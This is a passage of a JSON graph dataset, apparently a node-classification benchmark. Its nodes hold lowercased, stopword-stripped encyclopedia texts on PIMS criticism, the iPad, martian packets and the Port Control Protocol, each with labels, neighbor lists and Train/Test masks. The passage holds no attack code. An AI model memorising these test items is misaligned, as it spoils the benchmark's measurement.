periods see example barilits 1994 p. 61 correlations sense including pims program initially give nothing reason investigate possible causalities substantiated intensively another important criticism pims take account heterogeneity data set presumption pims analysis laws marketplace apply industries however statistical assumptions employed econometric analysis make assumption cross-sectional observations come one statistical distribution cross-sectional observations tends achilles heel virtually cross-sectional analyses homogeneous assumption false cross-sectional observations drawn different populations one use estimation techniques fixed-effects control different population means co-variances also differ across populations meaning behavior differs across populations way one control aspect run regressions population separately means laws marketplace differ across populations directly contradicting one main presumptions using pims data base analysis tellis golder 1996 claim pims defines markets narrowly respondents described market narrowly give appearance high market share believe self reporting bias makes conclusions suspect also concerned defunct companies included leading survivor bias",
    "neighbors": [
      444
    ],
    "mask": "Test"
  },
  {
    "node_id": 6539,
    "label": 2,
    "text": "IPad:ipad ipad line tablet computers designed developed marketed apple inc. run ios ipados mobile operating systems first ipad released april 3 2010 recent ipad models sixth-generation ipad released march 27 2018 fifth-generation ipad mini released march 18 2019 third-generation ipad air released march 18 2019 third-generation ipad pro released november 7 2018. apple sold 360 million ipads though sales peaked 2013 popular tablet computer sales second quarter 2018 user interface built around device multi-touch screen including virtual keyboard ipads connect via wi-fi models also cellular connectivity ipads shoot video take photos play music perform internet functions web-browsing emailing functions games reference gps navigation social networking etc enabled downloading installing apps app store million apps ipad apple third parties nine versions ipad first generation established design precedents persisted models 2nd-generation ipad ipad 2 introduced new thinner design dual-core apple a5 processor vga front-facing 720p rear-facing cameras designed facetime video calling third generation added retina display new apple a5x processor quad-core graphics processor 5-megapixel camera hd 1080p video recording voice dictation 4g lte fourth generation added apple a6x processor replaced 30-pin connector all-digital lightning connector ipad air added apple a7 processor apple m7 motion coprocessor reduced thickness first time since ipad 2 ipad air 2 added apple a8x processor apple m8 motion coprocessor 8-megapixel camera touch id fingerprint sensor reduced thickness ipad introduced 2017 added apple a9 processor sacrificing improvements ipad air 2 introduced exchange lower launch price 2018 apple released 2018 model ipad apple a10 fusion processor apple pencil support year later 2019 ipad air released 10.5-inch display apple a12 chip five versions ipad mini screen size first generation similar internal specifications ipad 2 uses lightning connector instead ipad mini 2 added retina display apple a7 processor apple m7 motion coprocessor closely matching internal specifications ipad air ipad mini 3 added touch id fingerprint sensor ipad mini 4 features apple a8 apple m8 motion coprocessor 5th generation features apple a12 soc three generations ipad pro first generation came 9.7 12.9 screen sizes second came 10.5 12.9 sizes third 11 12.9 sizes ipad pros unique features smart connector exclusive series ipads apple co-founder steve jobs said 1983 speech company strategy simple want want put incredibly great computer book carry around learn use 20 minutes ... really want radio link n't hook anything 're communication larger databases computers apple first tablet computer newton messagepad 100 introduced 1993 powered arm6 processor core developed arm 1990 spinout acorn computers apple invested apple also developed prototype powerbook duo based tablet penlite decided sell order avoid hurting messagepad sales apple released several newton-based pdas final one messagepad 2100 discontinued 1998 apple re-entered mobile-computing markets 2007 iphone smaller ipad featuring camera mobile phone pioneered multi-touch finger-sensitive touchscreen interface apple ios mobile operating system late 2009 ipad release rumored several years speculation mostly talked apple tablet specific names included itablet islate ipad announced january 27 2010 steve jobs apple press conference yerba buena center arts san francisco jobs later said apple begun developing ipad iphone jonathan ive 1991 created industrial design stylus-based tablet macintosh folio first project apple 2004 studio company participating development large tablet prototype later described crude involving projectors ive stated seeking produce tablet first came agree jobs phone important tablet innovations would work well ipad internal codename k48 revealed court case surrounding leaking ipad information launch apple began taking pre-orders first-generation ipad march 12 2010 major change device announcement available pre-order change behavior side switch perform either sound muting screen rotation locking user selectable wi-fi version ipad went sale united states april 3 2010 wi-fi 3g version released april 30 3g service united states provided initially sold two prepaid contract-free data plan options one unlimited data 250 mb per month half price june 2 2010 announced effective june 7 unlimited plan would replaced new customers 2 gb plan slightly lower cost existing customers would option keep unlimited plan plans activated ipad cancelled time initially ipad available order apple store since become available purchase retailers including amazon walmart network operators ipad launched countries including australia canada france germany japan united kingdom may 28 online pre-orders countries began may 10 apple released ipad hong kong ireland mexico new zealand singapore july 23 2010 israel briefly prohibited importation ipad concerns wi-fi might interfere devices september 17 2010 ipad officially launched china jobs unveiled ipad 2 press conference march 2 2011 33 thinner predecessor 15 lighter ipad 2 better processor dual core apple a5 apple says twice fast predecessor cpu operations nine times fast gpu operations ipad 2 includes front back cameras support facetime videophone application well three-axis gyroscope retained original 10‑hour battery life similar pricing scheme successor ipad 2 unveiled march 7 2012 apple ceo tim cook yerba buena center arts new ipad contained new dual core a5x processor quad-core graphics retina display resolution 2,048 1,536 pixels 50 percent pixels standard high definition tv screen brief controversy erupted revealed lte advertised work countries october 23 2012 apple announced fourth generation ipad began shipping november 2 2012 new hardware includes a6x processor hd facetime camera improved lte compatibility all-digital lightning connector available storage increments pricing structure third generation following announcement fourth-generation ipad previous generation discontinued alongside launch fourth generation hardware apple announced ipad mini screen measuring 7.9 inches aimed emerging sector smaller tablets kindle fire nexus 7 hardware new ipad mini similar ipad 2 1,024 768 pixel resolution screen dual core a5 processor 53 lighter 7.2 mm thick released november 2 2012 16 gb 32 gb 64 gb capacities wi-fi wi‑fi cellular versions october 22 2013 apple introduced fifth generation ipad called ipad air second generation ipad mini called ipad mini 2 comes retina display ipad air went sale november 1 2013 starting 499 ipad mini 2 released november 12 2013 starting 399 first quarter 2014 apple reported sold 25 million ipads all-time quarterly record compared 22.9 million year-ago quarter october 2014 apple released ipad air 2 ipad mini 3 ipad air 2 first ios device feature triple core cpu 2gb ram well thinner faster predecessor ipad air features touch id available gold color option ipad mini 3 similar ipad mini 2 design hardware also includes touch id available gold color september 2015 ipad pro announced included 12.9-inch screen 9.7-inch version announced march 2016 addition 256 gb option ipad pro models march 21 2017 new ipad announced hardware includes a9 processor designed budget version ipad june 2017 ipad pro second generation hardware announced 12.9 10.5-inch screens march 28 2018 new ipad 9.7-inch 2018 model 6th generation announced new model uses a10 fusion processor fully supports apple pencil replaces 2017 model october 30 2018 third-generation ipad pro announced first generation support 1tb storage march 18 2019 apple announced ipad air 2019 ipad mini 2019 a12 bionic processors ipad first two generations touchscreen display 1,024 768 pixel liquid-crystal display diagonal fingerprint- scratch-resistant glass steve jobs said 7-inch screen would small express software 10 inches minimum tablet screen like iphone ipad designed controlled bare fingers normal non-conductive gloves styli work although special gloves capacitive styli designed use display responds sensors ambient light sensor adjust screen brightness 3-axis accelerometer sense ipad orientation switch portrait landscape modes unlike iphone ipod touch built-in applications work three orientations portrait landscape-left landscape-right ipad built-in applications support screen rotation four orientations including upside-down consequently device intrinsic native orientation relative position home button changes four physical switches ipad including home button near display returns user main menu three plastic physical switches sides wake/sleep volume up/down plus software-controlled switch whose function changed software updates originally switch locked screen current orientation ios 4.2 changed mute switch rotation lock available onscreen menu ios 4.3 update released ipad 2 setting added allow user specify whether side switch used rotation lock mute first generation ipad camera ipad 2 front vga camera rear-facing 720p camera capable still images taken low quality 0.3 megapixels 30fps video rear-facing camera 5× digital zoom still images shoot photo video fullscreen aspect ratio unlike iphone 4 shoots widescreen aspect ratio unlike iphone ipad support tap focus allow tap set auto exposure cameras allow facetime video messaging iphone 4 fourth generation ipod touch snow leopard lion mountain lion macs ipad two internal speakers reproducing left right channel audio located bottom-right unit original ipad speakers push sound two small sealed channels leading three audio ports carved device ipad 2 speakers behind single grill volume switch right side unit 3.5-mm trrs connector audio-out jack top-left corner device provides stereo sound headphones without microphones and/or volume controls ipad also contains microphone used voice recording built-in bluetooth 2.1 edr interface allows wireless headphones keyboards used ipad however ios currently support file transfer via bluetooth ipad also features 1,024×768 vga video output limited applications screen capture connecting external display television accessory adapter ipad uses internal rechargeable lithium-ion polymer lipo battery batteries made taiwan simplo technology 60 dynapack international technology ipad designed charged high current 2 amperes using included 10 w usb power adapter usb cord usb connector one end 30-pin dock connector end charged standard usb port computer limited 500 milliamperes 0.5 amps result ipad running powered normal usb computer port may charge slowly high-power usb ports found newer apple computers accessories provide full charging capabilities apple claims battery generations ipad provide 10 hours video 140 hours audio playback one month standby like rechargeable battery technology ipad battery loses capacity time designed user-replaceable program similar battery-replacement program ipod original iphone apple replace ipad hold electrical charge refurbished ipad fee us 99 plus 6.95 shipping different unit supplied user data preserved refurbished unit new case warranty refurbished unit may vary jurisdictions independent companies also provide battery replacement service returning original unit new battery original case alternatively possible technically competent user buy install new battery task require soldering technically challenging ipad released three capacity options storage 16 32 64 gb internal flash memory january 29 2013 apple announced 128 gb model fourth generation ipad released february 5 data stored internal flash memory option expand storage apple sells camera connection kit sd card reader used transfer photos videos march 21 2016 apple announced 256 gb model ipad pro released march 31 2017 apple released 10.5-inch ipad pro revised 12.9-inch ipad pro 512 gb option first kind ios device 2018 apple released 11-inch 12.9-inch ipad pro 1tb option apple ios combination specific hardware uses crypto-shredding activating erase content settings obliterating keys 'effaceable storage renders user data device cryptographically inaccessible ipad models come two basic variants wi-fi wi-fi cellular support cellular variants however support circuit-switched voice calls texts data connectivity side wi-fi 3g ipad micro-sim slot mini-sim 3g ipad used compatible gsm carrier unlike iphone usually sold 'locked specific carriers first generations ipad u.s. data network access via t-mobile network limited slower edge cellular speeds t-mobile 3g network time used different frequencies second generation ipad introduced third tier models cdma support verizon wireless united states available separately capable version ipad 4th generation uses micro-sim first generation ipad mini uses nano-sim introduced iphone 5 ipad mini available two different frequency bands worldwide devices support quad-band gsm quad-band umts frequencies one variant also supports lte bands 4 17 principally intended use u.s. network adds support lte bands 1 3 5 13 25 cdma ev-do rev rev b 5th generation ipad 2nd generation ipad mini introduced support many additional lte bands worldwide ipad air mini retina display cellular models come two variants support nano-sims quad-band gsm penta-band umts dual-band cdma ev-do rev b. additionally one variant ipad also supports lte bands 1 2 3 4 5 7 8 13 17 18 19 20 25 26 variant supports lte bands 1 2 3 5 7 8 18 19 20 td-lte bands 38 39 40 apple ability handle many different bands one device allowed offer first time single ipad variant supports cellular bands technologies deployed major north american wireless providers time device introduction moreover t-mobile usa selling ipad air mini retina display models became first ipads made available purchase directly four nationwide u.s. wireless carriers previously indicated u.s. carriers selling hardware variant device apple offers several ipad accessories adapters proprietary 30-pin dock connector ipad port besides headphone jack dock holds ipad upright angle dock connector audio line port generation ipad requires corresponding dock dock included physical keyboard supported original ipad generations compatible bluetooth keyboards also work macs pcs ipad charged standalone power adapter wall charger also used ipods iphones 10 w charger included ipad apple sells camera connection kit consists two separate adapters dock connector one usb type sd card reader adapter used transfer photos videos plug usb audio card midi keyboard third party sells adapter includes usb sd microsd single unit adapter vga connectors allows ipad work external monitors projectors another adapter mirrors screen onto hdmi compatible devices 1080p works apps rotations unlike adapters allows ipad charge another dock connector hdmi adapter released advertised second generation ipad also works first-generation ipad iphone 4 fourth generation ipod touch smart covers screen protectors magnetically attach align face ipad 2 3 4 cover three folds allow convert stand also held together magnets original ipad owners could purchase black case included similarly folding cover smart cover meant minimal easily detachable protects screen smart covers microfiber bottom cleans front ipad wakes cover removed five different colors polyurethane leather leather expensive smart covers compatible original ipad june 2012 apple started selling smart case case combined function smart cover back protection case compatible ipad 2 ipad 3rd 4th generation devices like iphone shares development environment ipad runs software software downloaded apple app store software written developers paid developer license registered devices ipad runs almost third-party iphone applications displaying iphone size enlarging fill ipad screen developers may also create modify apps take advantage ipad features onemillion apps optimized ipad application developers use ios sdk developing applications ipad ipad originally shipped customized ipad-only version iphone os dubbed v3.2 september 1 announced ipad would get ios 4.2 november 2010 fulfill apple released ios 4.2.1 public november 22 interface centred around home screen graphical list available applications home screen accessed time hardware button screen closing open application process users also add delete icons dock every home screen home screen holds twenty icons dock holds six icons users delete web clips third-party applications time may select certain applications transfer itunes apple default programs however may removed almost input given touch screen understands complex gestures using multi-touch ipad interaction techniques enable user move content touch-drag motion finger example zooming web pages photos done placing two fingers screen spreading farther apart bringing closer together gesture known pinching scrolling long list menu achieved sliding finger display bottom top vice versa go back either case list moves pasted outer surface wheel slowly decelerating affected friction way interface simulates physics real object user-centered interactive effects include horizontally sliding sub-selection vertically sliding keyboard bookmarks menu widgets turn around allow settings configured side menu bars found top bottom screen necessary options vary program always follow consistent style motif menu hierarchies back button top-left corner screen displays name parent folder layout music library similar ipod current symbian s60 phones ipad sort media library songs artists albums videos playlists genres composers podcasts audiobooks compilations options always presented alphabetically except playlists retain order itunes iphone uses large font allows users plenty room touch selection users rotate device horizontally landscape mode access cover flow likewise feature may disabled purposely wishing view screen another angle like itunes feature shows different album covers scroll-through photo library scrolling achieved swiping finger across screen alternatively headset controls used pause play skip repeat tracks ipad supports gapless playback like fifth-generation ipods introduced 2005 ipad play digital video allowing users watch tv shows movies widescreen double-tapping switches widescreen video playback ipad allows users purchase download songs itunes store directly ipad includes software allows user upload view email photos taken camera user zooms photos sliding two fingers apart closer together much like safari camera application also lets users view camera roll pictures taken ipad camera pictures also available photos application along transferred iphoto aperture mac photoshop windows pc ipad use wi-fi network trilateration skyhook wireless provide location information applications google maps 3g model supports a-gps allow position calculated gps relative nearby cellphone towers also black strip back aid 3g reception ipad headphone jack proprietary apple dock connector ethernet usb port however apple camera connection kit accessory provides two dock connector adapters importing photos videos via usb sd memory cards ipad comes several applications including safari mail photos video ipod itunes app store ibooks maps notes calendar contacts several improved versions applications developed iphone mac apps currently missing weather calculator health apps ipad syncs itunes mac windows pc apple ported iwork suite mac ipad sells pared versions pages numbers keynote apps app store although ipad designed replace mobile phone user use wired headset built-in speaker microphone place telephone calls wi-fi 3g using voip application ipad specific apps app store december 2010 reuters reported iphone ipad users lodged lawsuit apple alleging applications passing information third party advertisers without consent ipad optional ibooks application downloaded app store displays books epub-format content downloaded ibookstore ipad launch april 3 2010 ibookstore available united states several major book publishers including penguin books harpercollins simon schuster macmillan committed publishing books ipad despite direct competitor amazon kindle barnes noble nook amazon.com barnes noble made kindle nook apps available ipad february 2010 condé nast said would sell ipad subscriptions several magazines june april 2010 new york times announced would begin publishing daily ipad top news section available free charge remainder payment subscription major news organizations including wall street journal bbc reuters released ipad applications newscorp created ipad-only publication daily february 2011 ceased operations december 2012 ipad assembled foxconn also manufactures apple ipod iphone mac mini largest plant shenzhen china pegatron shanghai china april 2011 foxconn announced would moving production ipad apple products brazil could begin production end 2011. isuppli estimated first-generation ipad 16 gb wi-fi version costs us 259.60 manufacture total excludes research development licensing royalty patent costs apple disclose makers ipad components teardown reports analysis industry insiders indicate various parts suppliers include ipad employ digital rights management drm os prevents users copying transferring certain content outside apple platform without authorization tv shows movies apps also ipad development model requires anyone creating app ipad sign non-disclosure agreement pay developer subscription critics argue apple centralized app approval process control platform could stifle software innovation particular concern digital rights advocates apple ability remotely disable delete apps ipad time digital rights advocates including free software foundation electronic frontier foundation computer engineer activist brewster kahle criticized ipad digital rights restrictions april 2010 paul sweeting analyst gigaom quoted national public radio saying ipad anti-internet hands ... offers major media companies opportunity essentially re-create old business model wherein pushing content terms rather going finding content search engine discovering content sweeting also thought limitations imposed apple impart feeling safe neighborhood saying apple offering gated community guard gate probably maid service laura sydell article author concludes consumers fears security internet viruses malware may happy opt apple gated community russian government switched ipads android devices security concerns like certain ios devices ipad jailbroken depending version ios running thus allowing applications programs authorized apple run device jailbroken users able download many applications previously unavailable app store via unofficial installers cydia well illegally pirated applications apple claims jailbreaking void factory warranty device united states even though jailbreaking legal ipad released april 2010 first jailbroken may 2010 spirit jailbreak ios version 3.1.2 ipad jailbroken ios versions 4.3 4.3.3 web-based tool jailbreakme 3.0 released july 2011 ios versions including 5.0 5.0.1 using redsn0w absinthe 2.0 released may 25 2012 first jailbreak method ios 5.1.1 devices except 32 nm version ipad 2 apple app store provides iphone ipad applications imposes censorship content become issue book publishers magazines seeking use platform guardian newspaper described role apple analogous british magazine distributor wh smith many years imposed content restrictions due exclusion pornography app store youporn others changed video format flash h.264 html5 specifically ipad e-mail exchange ryan tate valleywag steve jobs claimed ipad offers freedom porn leading many upset replies including adbustings berlin artist johannes p. osterhoff san francisco wwdc10 may 28 2010 ipad released australia canada japan well several larger european countries media reaction launch mixed media noted positive response fans device thousands people queued first day sale number countries media reaction ipad announcement mixed walter mossberg wrote software stupid meaning hardware features build less important ipad success software user interface first impressions largely positive mossberg also called price modest device capabilities praised ten-hour battery life others including pc advisor sydney morning herald wrote ipad would also compete proliferating netbooks use microsoft windows base model 499 price lower pre-release estimates tech press wall street analysts apple competitors expecting much higher entry price point cnet also criticized ipad apparent lack wireless sync portable devices microsoft zune number years built-in itunes app able download internet well reviews ipad generally favorable walt mossberg wall street journal called pretty close laptop killer david pogue new york times wrote dual review one part technology-minded people part non-technology-minded people former section notes laptop offers features cheaper price ipad review latter audience however claims readers like concept device understand intended uses enjoy using device pc magazine tim gideon wrote winner undoubtedly driving force shaping emerging tablet landscape michael arrington techcrunch said ipad beats even optimistic expectations new category device also replace laptops many people pc world criticized ipad file sharing printing abilities ars technica said sharing files computer one least favorite parts ipad experience media also praised quantity applications well bookstore media applications contrast criticized ipad closed system mentioned ipad faces competition android-based tablets outsold ipads 2013 surpassing ipads second quarter 2013 overtaken ipad installed base lost majority web browsing android statcounter estimates south america africa asia many large countries eastern europe independent criticized ipad readable bright light paper praised able store large quantities books uk release daily telegraph said ipad lack adobe flash support annoying ipad selected time magazine one 50 best inventions year 2010 popular science chose top gadget behind overall best new 2010 winner groasis waterboxx ipad tablets still wide margin globally second used android tablets market share however differs widely regions ipad lost market share globally every year since 2012 statcounter started tracking tablets separately according statcounter statistics tracks web use gives operating system/platform share based ipad lost majority use south america android also lose majority gaining back asia africa lost wide margin android 70 ipad mostly used consumers also taken business users within 90 days release ipad managed penetrate 50 fortune 100 companies companies adopting ipads business offices distributing making available ipads employees examples uses workplace include attorneys responding clients medical professionals accessing health records patient exams managers approving employee requests survey frost sullivan shows ipad usage office workplaces linked goals increased employee productivity reduced paperwork increased revenue research firm estimates mobile-office application market north america may reach 6.85 billion 2015 estimated 1.76 billion 2010 since march 2011 us federal aviation administration faa approved ipad in-cockpit use cut paper consumption several airlines 2011 alaska airlines became first airline replace pilots paper manuals ipads weighing compared printed flight manuals hopes fewer back muscle injuries dozen airlines followed suit including united distributed ipads cockpits also many airlines offer inflight magazine downloadable application ipad ipad several uses classroom praised valuable tool homeschooling soon ipad released reported 81 top book apps children ipad also called revolutionary tool help children autism learn communicate socialize easily healthcare field ipads iphones used help hospitals manage supply chain example novation healthcare contracting services company developed vha pricelynx based mobile application platform business intelligence software vendor microstrategy business intelligence app help health care organizations manage purchasing procedures efficiently save money hospitals guillermo ramas novation states doctors wo n't walk around hospital laptop ipad perfect walk around hospital long information need 2013 gianna chien aged 14 presented 8,000 doctors heart rhythm society meeting apple ipad 2 cases interfere life-saving heart devices pacemakers magnets inside ipad user guide advised pacemaker users keep ipads least away pacemaker study 2014 found ipad 2 could cause electromagnetic interference emi implantable cardioverter defibrillators united states fans attending super bowl xlv first super bowl since ipad released could use official national football league nfl app navigate cowboys stadium 2011 tampa bay buccaneers became first nfl club discontinue use paper copies playbooks instead distributed players playbook videos electronic format via ipad 2 ipad able support many music creation applications addition itunes music playback software include sound samplers guitar voice effects processors sequencers synthesized sounds sampled loops virtual synthesizers drum machines theremin-style touch responsive instruments drum pads many gorillaz 2010 album fall created almost exclusively using ipad damon albarn tour band music video luna sea 2012 single rouge filmed entirely ipad ipad greatly increased social television use viewers use ipad convenient second networked computer second screen communicating viewers television provider viewers use web browser specialized applications discuss program viewers broadcast content providers may use second screen interact viewers real time example latter facility allows content providers conduct real-time polls collect comments program displayed text main television screen viewer interaction via second screen becoming increasingly popular",
    "neighbors": [
      10755,
      9732,
      10761,
      1549,
      5647,
      7697,
      3602,
      4114,
      6165,
      11289,
      3610,
      7706,
      2076,
      8222,
      1057,
      6183,
      1576,
      9768,
      6186,
      4139,
      6700,
      7211,
      9769,
      47,
      5681,
      1074,
      3634,
      8754,
      9267,
      9784,
      8253,
      8767,
      576,
      7745,
      1090,
      10303,
      2630,
      5191,
      8774,
      7246,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      5210,
      2139,
      9308,
      10330,
      4190,
      3167,
      9312,
      3681,
      9826,
      5733,
      8806,
      3691,
      8303,
      2673,
      6258,
      2676,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      8320,
      10365,
      2179,
      2691,
      4741,
      10878,
      8842,
      6283,
      7307,
      6797,
      11405,
      7824,
      8336,
      147,
      9363,
      149,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      4259,
      7842,
      7844,
      11430,
      3241,
      171,
      5292,
      2735,
      3248,
      7857,
      9391,
      2232,
      4283,
      3772,
      7869,
      8893,
      8896,
      9408,
      196,
      6654,
      4807,
      713,
      4810,
      3790,
      1744,
      4816,
      2258,
      2259,
      7378,
      3286,
      4822,
      9430,
      8409,
      218,
      1242,
      8921,
      3293,
      4318,
      9952,
      6883,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      5869,
      9964,
      1776,
      10478,
      5874,
      9970,
      3828,
      10481,
      4856,
      8441,
      11000,
      11513,
      1276,
      7420,
      2819,
      6408,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      1300,
      4888,
      5912,
      1819,
      8480,
      5927,
      1832,
      10023,
      4910,
      303,
      4399,
      7983,
      11062,
      823,
      7991,
      2361,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      7489,
      1346,
      10562,
      10052,
      838,
      7496,
      8525,
      2383,
      2388,
      2902,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      4977,
      3956,
      7029,
      1400,
      9084,
      7549,
      11649,
      9605,
      2950,
      2439,
      6023,
      3977,
      3978,
      6537,
      7051,
      7052,
      1428,
      10646,
      410,
      3483,
      10658,
      2979,
      9123,
      11171,
      11173,
      424,
      8109,
      9648,
      8627,
      10675,
      441,
      2492,
      446,
      7614,
      5058,
      6595,
      10691,
      8645,
      2502,
      456,
      8136,
      1482,
      7118,
      464,
      5072,
      6608,
      8662,
      9174,
      10199,
      8665,
      4061,
      7133,
      9182,
      4068,
      5093,
      8164,
      487,
      488,
      2023,
      8170,
      10223,
      5616,
      6130,
      5619,
      7154,
      2551,
      2553,
      8700,
      1534,
      4607
    ],
    "mask": "Test"
  },
  {
    "node_id": 6540,
    "label": 4,
    "text": "Martian_packet:martian packet martian packet ip packet seen public internet contains source destination address reserved special-use internet assigned numbers authority iana public internet packet either spoofed source address actually originate claimed packet delivered requirement found martian packets commonly arise ip address spoofing denial-of-service attacks also arise network equipment malfunction misconfiguration host linux terminology martian packet ip packet received kernel specific interface routing tables indicate source ip expected another interface name derived packet mars meaning packet seems earth ipv4 ipv6 martian packets source destination addresses within special-use ranges defined rfc 6890 6to4 ipv6 transition technology ipv6 address encodes originating ipv4 address every ipv4 /32 corresponding unique ipv6 /48 prefix 6to4 relays use encoded value determining end site 6to4 tunnel 6to4 addresses corresponding ipv4 martians routable never appear public internet teredo another ipv6 transition technology encodes originating ipv4 address ipv6 address however encoding format encodes teredo server address tunnel information ipv4 client address thus definable set prefixes specific 2001:0 :/32 teredo packets martian end-site addresses however possible spoof teredo packets teredo server ipv4 address set martian",
    "neighbors": [
      3872,
      5472,
      2947,
      2409,
      823,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 6541,
    "label": 5,
    "text": "Port_Control_Protocol:port control protocol port control protocol pcp computer networking protocol allows hosts ipv4 ipv6 networks control incoming ipv4 ipv6 packets translated forwarded upstream router performs network address translation nat packet filtering allowing hosts create explicit port forwarding rules handling network traffic easily configured make hosts placed behind nats firewalls reachable rest internet also act network servers requirement many applications additionally explicit port forwarding rules available pcp allow hosts reduce amount generated traffic eliminating workarounds form outgoing nat keepalive messages required maintaining connections servers various nat traversal techniques tcp hole punching time less generated traffic reduces power consumption directly improving battery runtime mobile devices pcp standardized 2013 successor nat port mapping protocol nat-pmp shares similar protocol concepts packet formats environments universal plug play internet gateway device upnp igd used local network interworking function upnp igd pcp required embedded igd upnp igd-pcp iwf specified rfc6970 dhcp ipv4 ipv6 options configure hosts port control protocol pcp server ip addresses specified rfc7291 procedure follow selecting server among list pcp server discussed rfc7488 environments nat64 deployed pcp allows learn ipv6 prefix es used pcp-controlled nat64 device build ipv4-converted ipv6 addresses nat64 rfc7225 many applications network equipment deployments require network locations reachable outside local networks following originally envisioned model ip end-to-end connectivity across internet operate network servers accept connections remote clients example equipment ip camera includes network server provides remote surveillance ip networks usually network equipment deployments place devices behind routers firewalls perform nat enable sharing ipv4 address example packet filtering improved network security protection ending breaking end-to-end connectivity rendering equipment applications inaccessible rest internet making deployed equipment accessible extending server role beyond local network requires either manual configuration port forwarding network gateway usually cpe application-level workarounds initiate connections deployed equipment additional intermediate servers used merging firewall punching connections connections actual clients approaches downsides manual cpe configuration usually either inconvenient possible using additional intermediate servers increases complexity cost example online computer game acts client requires communication game server exchanging gameplay data order make possible game server provide data clients clients must made accessible server usually clients initiate connections game server open communication channels however open connections become idle subsequently closed network gateways leading necessity maintaining using form keepalive messages keepalive messages small messages sent client server create traffic communication channel therefore prevent gateway servers closing thus keeping connection alive requires constant exchange empty messages client server increases network chatter wastes network bandwidth cpu cycles decreases autonomy battery-powered devices additionally network applications example ftp require dynamic opening multiple connections involves application-level gateways algs additionally increases complexity pcp allows equipment applications create explicit mappings external ip address protocol port internal ip address protocol port explicit mappings place inbound communication reach hosts behind nat firewall either expands server roles beyond boundaries local networks makes use various services simplified less resource-consuming created mappings permanent extent known lifetime extended similar way dynamic host configuration protocol dhcp implements leases time pcp allows applications create additional mappings dynamically required reduces eliminates need alg-enabled nat devices firewalls created explicit mappings known lifetime commonly several hours need application-level keepalive messages exchanged hosts servers purpose preserving mapping result network usage power consumption reduced application-level keepalive logic longer needs implemented client server sides pcp mapping response provides application associated externally visible parameters ip address protocol port announced clients application-specific ways incoming connections established additionally pcp inform applications external ip address changed mapping already established various types nat handled pcp providing support nat64 nat66 nat44 inclusion pcp ipv4 ipv6 firewall devices also supported pcp designed used large-scale aggregation points example part carrier-grade nats inside less expensive consumer-grade devices long-term ip camera temperature sensor acting server example short-term mappings playing online computer game example supported pcp supports transport layer protocols use 16-bit port numbers example tcp udp stream control transmission protocol sctp datagram congestion control protocol dccp protocols use port numbers example resource reservation protocol rsvp encapsulating security payload esp icmp icmpv6 supported ipv4 firewall ipv6 firewall nptv6 ipv6 prefix translation functions supported one client per external ip address case nat pcp specification define mechanism dealing multi-homed networks multiple network gateways default routes nonetheless possible implement pcp networks using coordination mechanism conntrackd however different networks external ip address es given pcp mapping use one protocol requires one specific external ip address provided client network become unavailable pcp mapping would updated use external ip address network pcp standardized 2013 successor nat port mapping protocol nat-pmp sharing similar protocol concepts packet formats one design differences nat-pmp pretty much limited deployment consumer-grade devices pcp designed also support carrier-grade equipment since 2005 nat-pmp implemented various apple products nat-pmp relates internet gateway device protocol igdp standardized 2001 part universal plug play upnp specification igdp complex tailored toward manual configuration nat-pmp designed simplicity use within software applications excluding attackers capable altering network packets exchanged explicit pcp mapping created packets contain negotiation required establishing explicit mapping exchanged hosts pcp-enabled nat devices firewalls pcp considered secure long created explicit mappings exceed domain implicit mappings words implicit mappings created result way nat devices firewalls handling regular outbound client connections meaning pcp safe long new mapping possibilities introduced explicit mapping mechanism security standpoint important pcp feature mapping request option used option signifies ip address specified additionally part mapping request used internal address created explicit mapping rather following default behavior using source ip address actual mapping request packet purpose mapping requests end pcp-enabled nat device firewall granting explicit mapping privileges higher allowed implicit mappings due unknown rules imposed elsewhere specified ip address allowing way attacker steal traffic conduct denial-of-service dos attack additionally explicit pcp security mechanisms available extensions pcp protocol providing authentication access control mechanisms using authenticated integrity-protected in-band signalling channel relies extensible authentication protocol eap perform authentication devices involved pcp negotiation session pcp-enabled nat devices firewalls may still accept unauthenticated mapping requests time previously described explicit mapping constraints still apply internally pcp works exchanging control messages hosts pcp-enabled nat devices firewalls referred servers using user datagram protocol udp underlying protocol communication consists port mapping requests created hosts result responses submitted processed servers following udp nature unreliability means udp datagrams lost duplicated reordered submitting request guarantee response kind thus host requests also referred hints addition direct responses servers also generate gratuitous notifications example unicast notifications inform hosts changes external ip address exchanged messages contain means determining either transaction belong stage session represent simplified design based messages self-describing complete additional context required message successfully processed servers may decide silently ignore host requests case unable process moment cases hosts need retransmit request also hosts may safely decide silently ignore unwanted mapping responses purpose creating pcp requests ip address server either manually configured host found part host dhcp lease set host configured default gateway host request messages sent source udp port client server udp port 5351 listens unsolicited multicast server notifications server restart announcements sent server udp port 5351 udp port 5350 hosts listen maximum udp payload length pcp messages 1100 octets pcp message consists request response header containing opcode determines associated operation relevant opcode-specific information ports mapped zero options option described result codes returned part server responses result code associated lifetime tells hosts certain operations may retried repeated example result lifetimes specify long failure condition expected persist long created mapping last",
    "neighbors": [
      10242,
      3847,
      649,
      4490,
      1164,
      9868,
      14,
      3218,
      9365,
      1942,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      8998,
      3751,
      3752,
      9381,
      939,
      10924,
      7214,
      7855,
      2737,
      562,
      6834,
      2996,
      6964,
      9909,
      5433,
      3770,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      8386,
      3011,
      7364,
      2887,
      8265,
      2509,
      4687,
      3792,
      6993,
      5843,
      2904,
      4956,
      5469,
      5470,
      5471,
      5472,
      10341,
      5608,
      10344,
      11112,
      367,
      6639,
      8432,
      372,
      6651,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 6542,
    "label": 4,
